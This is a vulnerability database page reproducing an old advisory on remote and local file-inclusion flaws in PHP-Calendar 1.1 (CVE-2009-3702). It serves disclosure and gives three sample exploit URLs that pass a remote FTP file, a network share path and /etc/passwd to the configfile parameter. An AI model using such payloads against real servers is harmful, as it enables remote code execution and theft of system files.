Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2009-3702

Publish Date: 21 Dec 2009

                							

                source: http://www.securityfocus.com/bid/37450/info
 
PHP-Calendar is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
 
PHP-Calendar 1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php
http://www.example.com/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php
http://www.example.com/php-calendar-1.1/update10.php?configfile=/etc/passwd

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

PHP-Calendar 1.1 - 'update10.php?configfile' Traversal Local File Inclusion

Vulmon Search

About

Products

Connect